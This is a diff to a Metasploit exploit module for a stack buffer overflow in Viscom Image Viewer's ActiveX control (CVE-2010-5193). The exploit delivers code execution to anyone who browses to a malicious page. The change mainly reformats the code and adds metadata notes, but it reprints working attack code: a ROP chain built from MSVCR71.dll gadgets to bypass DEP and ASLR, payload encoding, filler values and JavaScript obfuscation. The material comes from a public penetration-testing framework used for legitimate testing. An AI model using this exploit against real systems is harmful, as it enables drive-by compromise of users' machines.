@@ -9,56 +9,61 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpServer::HTML
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control',
+        'Description' => %q{
           This module exploits a stack based buffer overflow in the Active control file
-        ImageViewer2.OCX by passing an overly long argument to an insecure TifMergeMultiFiles()
-        method. Exploitation results in code execution with the privileges of the user who
-        browsed to the exploit page.
+          ImageViewer2.OCX by passing an overly long argument to an insecure TifMergeMultiFiles()
+          method. Exploitation results in code execution with the privileges of the user who
+          browsed to the exploit page.
 
-        The victim will first be required to trust the publisher Viscom Software.
-        This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7
-        with Java support.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+          The victim will first be required to trust the publisher Viscom Software.
+          This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7
+          with Java support.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'Dr_IDE', # Vulnerability discovery and original exploit
           'TecR0c <roccogiovannicalvi[at]gmail.com>', # Metasploit module
-          'mr_me <steventhomasseeley[at]gmail.com>'  # Metasploit module
+          'mr_me <steventhomasseeley[at]gmail.com>' # Metasploit module
         ],
-      'References'     =>
-        [
+        'References' => [
           [ 'CVE', '2010-5193' ],
           [ 'OSVDB', '78102' ],
           [ 'EDB', '15668' ],
           [ 'URL', 'http://web.archive.org/web/20101204093821/http://secunia.com:80/advisories/42445' ],
           [ 'URL', 'http://xforce.iss.net/xforce/xfdb/63666' ]
         ],
-      'DefaultOptions' =>
-        {
+        'DefaultOptions' => {
           'EXITFUNC' => 'process',
           'DisablePayloadHandler' => false,
           'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
-      'Payload'        =>
-        {
-          'Space'         => 1024,
-          'BadChars'      => "\x00"
+        'Payload' => {
+          'Space' => 1024,
+          'BadChars' => "\x00"
         },
-      'Platform'       => 'win',
-      'Targets'        =>
-        [
+        'Platform' => 'win',
+        'Targets' => [
           [ 'Automatic', {} ],
           [ 'Internet Explorer 6/7', {} ],
           [ 'Internet Explorer 8 with JRE', {} ]
         ],
-      'DisclosureDate' => '2010-03-03',
-      'DefaultTarget'  => 0))
+        'DisclosureDate' => '2010-03-03',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
 
     register_options(
-      [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript Obfuscation', true]) ])
+      [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript Obfuscation', true]) ]
+    )
   end
 
   # Prevent module from being executed in autopwn
@@ -71,7 +76,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def on_request_uri(cli, request)
-
     # Set target manually or automatically
     my_target = target
     if my_target.name == 'Automatic'
@@ -97,26 +101,26 @@ class MetasploitModule < Msf::Exploit::Remote
     if my_target.name =~ /JRE/
 
       code =
-      [ # MSVCR71.dll - rop chain generated with mona.py
-        0x7C37653D, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
-        0xFFFFFDFF, # Value to negate, will become 0x00000201 (dwSize)
-        0x7C347F98, # RETN (ROP NOP)
-        0x7C3415A2, # JMP [EAX]
-        0xFFFFFFFF, #
-        0x7C376402, # Skip 4 bytes
-        0x7C351E05, # NEG EAX # RETN
-        0x7C345255, # INC EBX # FPATAN # RETN
-        0x7C352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
-        0x7C344F87, # POP EDX # RETN
-        0xFFFFFFC0, # Value to negate, will become 0x00000040
-        0x7C351EB1, # NEG EDX # RETN
-        0x7C34D201, # POP ECX # RETN
-        0x7C38B001, # &Writable location
-        0x7C347F97, # POP EAX # RETN
-        0x7C37A151, # Ptr to &VirtualProtect() - 0x0EF
-        0x7C378C81, # PUSHAD # ADD AL,0EF # RETN
-        0x7C345C30, # Ptr to 'push esp # ret
-      ].pack("V*")
+        [ # MSVCR71.dll - rop chain generated with mona.py
+          0x7C37653D, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
+          0xFFFFFDFF, # Value to negate, will become 0x00000201 (dwSize)
+          0x7C347F98, # RETN (ROP NOP)
+          0x7C3415A2, # JMP [EAX]
+          0xFFFFFFFF, #
+          0x7C376402, # Skip 4 bytes
+          0x7C351E05, # NEG EAX # RETN
+          0x7C345255, # INC EBX # FPATAN # RETN
+          0x7C352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
+          0x7C344F87, # POP EDX # RETN
+          0xFFFFFFC0, # Value to negate, will become 0x00000040
+          0x7C351EB1, # NEG EDX # RETN
+          0x7C34D201, # POP ECX # RETN
+          0x7C38B001, # &Writable location
+          0x7C347F97, # POP EAX # RETN
+          0x7C37A151, # Ptr to &VirtualProtect() - 0x0EF
+          0x7C378C81, # PUSHAD # ADD AL,0EF # RETN
+          0x7C345C30, # Ptr to 'push esp # ret
+        ].pack("V*")
 
       code << payload.encoded
       sploit << [0x100EAD78].pack("V") # POP ESP # RETN [IMAGEV~1.OCX]
@@ -129,7 +133,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Payload in JS format
     code = Rex::Text.to_unescape(code)
     randnop = rand_text_alpha(rand(100) + 1)
-    js_nops = Rex::Text.to_unescape("\x0c"*4)
+    js_nops = Rex::Text.to_unescape("\x0c" * 4)
 
     sploit << [0x41414141].pack("V") # Filler
     sploit << [0x42424242].pack("V") # Filler
@@ -181,7 +185,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Transmit the response to the client
     send_response_html(cli, html)
-
   end
 
 end
